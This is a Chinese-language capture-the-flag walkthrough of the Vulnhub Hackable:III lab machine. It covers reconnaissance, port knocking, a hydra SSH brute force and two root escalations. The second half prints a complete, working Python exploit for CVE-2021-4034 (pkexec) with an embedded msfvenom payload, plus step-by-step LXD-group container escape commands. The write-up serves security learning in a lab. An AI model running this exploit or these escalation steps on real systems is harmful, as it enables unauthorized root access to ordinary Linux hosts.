guayu-kakeru
0%

Vulnhub-Hackable:III

发表于 分类于

Vulnhub-Hackable:III靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.164    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 17:01 CST
Nmap scan report for 192.168.179.164 (192.168.179.164)
Host is up (0.0030s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Kryptos - LAN Home
|_http-server-header: Apache/2.4.46 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/config
MAC Address: 2A:A3:5A:42:17:24 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   2.98 ms 192.168.179.164 (192.168.179.164)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.08 seconds

没有什么多多余的信息了,只开放80和22,但是22端口是filtered,大概率要knock 去web看看

web 探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.164                      
<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="https://fonts.googleapis.com/css?family=RocknRoll+One" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="css/file.css">
    <title>Kryptos - LAN Home</title>

</head>
<body>
    <a href="#" class="menu-open"><img src="imagens/logo_menu.png" width="2" height="2"></a>
    <div class="overlay"></div>
    <div class="menu">
      <a href="#" class="menu-close">&times;</a>
      <ul>
        <li><a href="login_page/login.html" target="_blank">Login</a></li>
        
      </ul>

    </div>
    <!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="js/script.js"></script>
</body>
</html>

出现了一个jubiscleudo的用户名,然后说确实要用knock来打开端口,以及有一个.jpg他需要批准
访问一下robots.txt发现有东西!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.164/robots.txt
User-Agente: *
Disallow: /config
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.164/config    
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.179.164/config/">here</a>.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.179.164 Port 80</address>
</body></html>


web中访问有一个base64加密过的文本

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# echo "MTAwMDA=" | base64 -d                                                
10000

只给了一个端口,先扫一下目录吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.164 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -x html,php,jpg,wbpg      
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.179.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,jpg,wbpg,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 487]
/index.html           (Status: 200) [Size: 1095]
/config.php           (Status: 200) [Size: 507]
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.html       (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htaccess.jpg        (Status: 403) [Size: 280]
/.htaccess.wbpg       (Status: 403) [Size: 280]
/robots.txt           (Status: 200) [Size: 33]
/.                    (Status: 200) [Size: 1095]
/home.html            (Status: 200) [Size: 11327]
/.html                (Status: 403) [Size: 280]
/.html.wbpg           (Status: 403) [Size: 280]
/.html.php            (Status: 403) [Size: 280]
/.html.jpg            (Status: 403) [Size: 280]
/.html.html           (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htpasswd.wbpg       (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd.html       (Status: 403) [Size: 280]
/.htpasswd.jpg        (Status: 403) [Size: 280]
/.htm                 (Status: 403) [Size: 280]
/.htm.html            (Status: 403) [Size: 280]
/.htm.php             (Status: 403) [Size: 280]
/.htm.wbpg            (Status: 403) [Size: 280]
/.htm.jpg             (Status: 403) [Size: 280]
/.htpasswds           (Status: 403) [Size: 280]
/.htpasswds.php       (Status: 403) [Size: 280]
/.htpasswds.jpg       (Status: 403) [Size: 280]
/.htpasswds.html      (Status: 403) [Size: 280]
/.htpasswds.wbpg      (Status: 403) [Size: 280]
/.htgroup.jpg         (Status: 403) [Size: 280]
/.htgroup             (Status: 403) [Size: 280]
/.htgroup.html        (Status: 403) [Size: 280]
/.htgroup.wbpg        (Status: 403) [Size: 280]
/.htgroup.php         (Status: 403) [Size: 280]
/.htaccess.bak        (Status: 403) [Size: 280]
/.htaccess.bak.jpg    (Status: 403) [Size: 280]
/.htaccess.bak.html   (Status: 403) [Size: 280]
/.htaccess.bak.php    (Status: 403) [Size: 280]
/.htaccess.bak.wbpg   (Status: 403) [Size: 280]
/.htuser              (Status: 403) [Size: 280]
/.htuser.jpg          (Status: 403) [Size: 280]
/.htuser.html         (Status: 403) [Size: 280]
/.htuser.php          (Status: 403) [Size: 280]
/.htuser.wbpg         (Status: 403) [Size: 280]
/3.jpg                (Status: 200) [Size: 61259]
/.ht.jpg              (Status: 403) [Size: 280]
/.ht.html             (Status: 403) [Size: 280]
/.ht                  (Status: 403) [Size: 280]
/.ht.php              (Status: 403) [Size: 280]
/.ht.wbpg             (Status: 403) [Size: 280]
/.htc.html            (Status: 403) [Size: 280]
/.htc                 (Status: 403) [Size: 280]
/.htc.wbpg            (Status: 403) [Size: 280]
/.htc.php             (Status: 403) [Size: 280]
/.htc.jpg             (Status: 403) [Size: 280]
Progress: 81220 / 81225 (99.99%)
===============================================================
Finished
===============================================================

config.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_NAME', 'hackable');
 
/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);


// Check connection
if($conexao === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>

login.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
include('config.php');

$usuario = $_POST['user'];
$senha = $_POST['pass'];

$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";  

$result = mysqli_query($conexao, $query);

$row = mysqli_num_rows($result);


#valida莽茫o conta
if($row == 1) {
	$_SESSION['usuario'] = $usuario;
	header('Location: 3.jpg');
	exit();
} else {
	$_SESSION['nao_autenticado'] = true;
	header('Location: login_page/login.html');
	exit();
}
?>

根据代码去/login_page/login.html路径,发现是一个登录界面用刚才config.php中的代码知道用户名是root,密码为空
但是这样子登录之后又给我返回php源代码部分
看这个代码登录成功也是给我定位到3.jpg里面了。那我直接获取这个3.jpg然后用stegseek破解一下

1
2
3
4
5
6
7
┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -wl /usr/share/wordlists/rockyou.txt 3.jpg         
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "steganopayload148505.txt".
[i] Extracting to "3.jpg.out".

得到 porta:65535 尝试用这两个端口knock了一下还是不行
那就说明我们信息获取还不过,所以继续用别的扫描器试试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.179.164
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.179.164/_25-02-11_17-49-38.txt

Target: http://192.168.179.164/

[17:49:38] Starting: 
[17:49:38] 301 -  315B  - /js  ->  http://192.168.179.164/js/               
[17:49:39] 403 -  280B  - /.ht_wsr.txt                                      
[17:49:39] 403 -  280B  - /.htaccess.bak1                                   
[17:49:39] 403 -  280B  - /.htaccess.sample                                 
[17:49:39] 403 -  280B  - /.htaccess.orig
[17:49:39] 403 -  280B  - /.htaccess.save
[17:49:39] 403 -  280B  - /.htaccess_orig                                   
[17:49:39] 403 -  280B  - /.htaccess_extra
[17:49:39] 403 -  280B  - /.htaccessBAK
[17:49:39] 403 -  280B  - /.htaccess_sc
[17:49:39] 403 -  280B  - /.htaccessOLD2
[17:49:39] 403 -  280B  - /.htaccessOLD
[17:49:39] 403 -  280B  - /.htm                                             
[17:49:39] 403 -  280B  - /.html                                            
[17:49:39] 403 -  280B  - /.htpasswds                                       
[17:49:39] 403 -  280B  - /.htpasswd_test
[17:49:39] 403 -  280B  - /.httr-oauth                                      
[17:49:42] 301 -  319B  - /backup  ->  http://192.168.179.164/backup/       
[17:49:42] 200 -  460B  - /backup/                                          
[17:49:43] 301 -  319B  - /config  ->  http://192.168.179.164/config/       
[17:49:43] 200 -  507B  - /config.php                                       
[17:49:43] 200 -  452B  - /config/                                          
[17:49:43] 301 -  316B  - /css  ->  http://192.168.179.164/css/             
[17:49:45] 200 -    3KB - /home.html                                        
[17:49:45] 200 -  456B  - /js/                                              
[17:49:46] 200 -  487B  - /login.php                                        
[17:49:49] 200 -   33B  - /robots.txt                                       
[17:49:49] 403 -  280B  - /server-status                                    
[17:49:49] 403 -  280B  - /server-status/

还真扫出来了其他目录,访问backup目录,得到一个wordlist文件,应该是用来爆破的
这里还有一个css目录也是多级目录,访问之后也可以看到文件,得到一个brainfuck加密的密文

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.179.164/css/2.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....

随便找一个在线解密网站得到4444
然后将4444 10000 65535 尝试不同顺序knock最后让22端口开放

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# nmap  192.168.179.164
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 19:04 CST
Nmap scan report for 192.168.179.164 (192.168.179.164)
Host is up (0.00040s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 2A:A3:5A:42:17:24 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

接下来就是用刚才得到的用户名和wordlist爆破ssh了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l jubiscleudo -P pass.txt ssh://192.168.179.164
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 19:07:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 300 login tries (l:1/p:300), ~19 tries per task
[DATA] attacking ssh://192.168.179.164:22/
[22][ssh] host: 192.168.179.164   login: jubiscleudo   password: onlymy
[STATUS] 300.00 tries/min, 300 tries in 00:01h, 5 to do in 00:01h, 7 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 19:08:36

成功拿到shell jubiscleudo/onlymy
这里还有一种可以用ipv6绕过knock的方法,详情可以看群主ll104567的视频https://space.bilibili.com/20805349?spm_id_from=333.1387.follow.user_card.click

提权

用linpeas.sh来找找有什么可以利用的
发现了在/var/www/html/.backup_config.php里有hackable_3用户的密码

切换用户

1
2
hackable_3@ubuntu20:~$ id
uid=1000(hackable_3) gid=1000(hackable_3) groups=1000(hackable_3),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

根据群主在群里发的文件知道lxd是可以提权的
LXD 是一个 root 进程,它负责执行任意用户的 LXD UNIX 套接字写入访问操作。而且在某些情况下,LXD 甚至都不会调用它的用户权限进行检查和匹配

Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于 Chroot 和完整开发的虚拟机之间,LXC 可以创建一个跟正常 Linux 操作系统十分接近的环境,但是不需要使用到单独的内核资源。

Linux Daemon(LXD)是一个轻量级容器管理程序,而 LXD 是基于 LXC 容器技术实现的,而这种技术之前 Docker 也使用过。LXD 使用了稳定的 LXC API 来完成所有的后台容器管理工作,并且增加了 REST API 支持,更进一步地提升了用户体验度。

在网上搜lxd提权
先下载利用的程序 https://github.com/saghul/lxd-alpine-builder
然后开http_server服务让靶机用wget能接受

1
2
3
4
5
┌──(root㉿kakeru)-[~]
└─# scp kakeru@192.168.179.82:Downloads/lxd-alpine-builder-master.zip .
(kakeru@192.168.179.82) Password:
lxd-alpine-builder-master.zip                                                    100% 3175KB 116.0MB/s   00:00

跟着网上lxd提权的步骤https://www.cnblogs.com/jhinjax/p/17078938.html,
接受文件后,初始化,一路回车

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root㉿kakeru)-[~/tmp/lxd-alpine-builder-master]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

hackable_3@ubuntu20:~$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  snap
hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 

Name of the new storage pool [default=default]: Name of the storage backend to use (ceph, btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” ornone”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” ornone”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 


hackable_3@ubuntu20:~$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias  image_name
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
hackable_3@ubuntu20:~$ lxc init image_name ignite -c security.privileged=true
Creating ignite
hackable_3@ubuntu20:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
hackable_3@ubuntu20:~$ lxc start ignite
hackable_3@ubuntu20:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)

原理
lxd 组用户可以以任意镜像创建容器,并将当前系统根目录挂载到已创建容器的 mnt 目录下,/mnt/root/ 目录是一个完整的根目录,可以使用 chroot 获取到这个根目录的完整 root 权限。
所以现在查文件就在/mnt/root目录下面

提权方法2

刚才用linpeas.sh扫描的时候扫出一个漏洞

可以找到pkexec的漏洞利用脚本,不过不是这里显示的两个,是CVE-2021-4034
这里我们选择用py脚本,不用先编译,方便而且在靶机上成功率高

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#!/usr/bin/env python3

# CVE-2021-4034 in Python
#
# Joe Ammond (joe@ammond.org)
#
# This was just an experiment to see whether I could get this to work
# in Python, and to play around with ctypes

# This was completely cribbed from blasty's original C code:
# https://haxx.in/files/blasty-vs-pkexec.c

import base64
import os
import sys

from ctypes import *
from ctypes.util import find_library

# Payload, base64 encoded ELF shared object. Generate with:
#
# msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
#
# The PrependSetuid=true is important, without it you'll just get
# a shell as the user and not root.
#
# Should work with any msfvenom payload, tested with linux/x64/exec
# and linux/x64/shell_reverse_tcp

payload_b64 = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''
payload = base64.b64decode(payload_b64)

# Set the environment for the call to execve()
environ = [
        b'exploit',
        b'PATH=GCONV_PATH=.',
        b'LC_MESSAGES=en_US.UTF-8',
        b'XAUTHORITY=../LOL',
        None
]

# Find the C library to call execve() directly, as Python helpfully doesn't
# allow us to call execve() with no arguments.
try:
    libc = CDLL(find_library('c'))
except:
    print('[!] Unable to find the C library, wtf?')
    sys.exit()

# Create the shared library from the payload
print('[+] Creating shared library for exploit code.')
try:
    with open('payload.so', 'wb') as f:
        f.write(payload)
except:
    print('[!] Failed creating payload.so.')
    sys.exit()
os.chmod('payload.so', 0o0755)

# make the GCONV_PATH directory
try:
    os.mkdir('GCONV_PATH=.')
except FileExistsError:
    print('[-] GCONV_PATH=. directory already exists, continuing.')
except:
    print('[!] Failed making GCONV_PATH=. directory.')
    sys.exit()

# Create a temp exploit file
try:
    with open('GCONV_PATH=./exploit', 'wb') as f:
        f.write(b'')
except:
    print('[!] Failed creating exploit file')
    sys.exit()
os.chmod('GCONV_PATH=./exploit', 0o0755)

# Create directory to hold gconf-modules configuration file
try:
    os.mkdir('exploit')
except FileExistsError:
    print('[-] exploit directory already exists, continuing.')
except:
    print('[!] Failed making exploit directory.')
    sys.exit()

# Create gconf config file
try:
    with open('exploit/gconv-modules', 'wb') as f:
        f.write(b'module  UTF-8//    INTERNAL    ../payload    2\n');
except:
    print('[!] Failed to create gconf-modules config file.')
    sys.exit()

# Convert the environment to an array of char*
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ

print('[+] Calling execve()')
# Call execve() with NULL arguments
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)
1
2
3
4
5
6
7
8
9
jubiscleudo@ubuntu20:~$ vi a.py
jubiscleudo@ubuntu20:~$ chmod +x a.py
jubiscleudo@ubuntu20:~$ ./a.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1001(jubiscleudo) groups=1001(jubiscleudo)
# pwd
/home/jubiscleudo

提权详细过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#(1)获取 Alpine Linux 镜像
wget http://攻击机IP/alpine-v3.13-x86_64-20210218_0139.tar.gz

#lxd初始化
lxd init   #一路回车

#然后导入镜像:
lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias image_name

#创建特权容器
lxc init image_name ignite -c security.privileged=true

#挂载宿主机的根目录
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

#启动并进入容器
lxc start ignite 
lxc exec ignite /bin/sh

#切换到宿主机环境
chroot /mnt/root

总结:学到了什么是lxd,以及用这个提权的方式,lxd提权后的目录在/mnt/root,以及内核提权的使用方式。
由于我是arm机器,前面在编译x86文件的时候还遇到问题,学会了交叉编译的工具x86_64-linux-gnu-gcc
以及在本机编译c语言需要用-static让编译出来的文件不用动态库,用脚本有py就不用c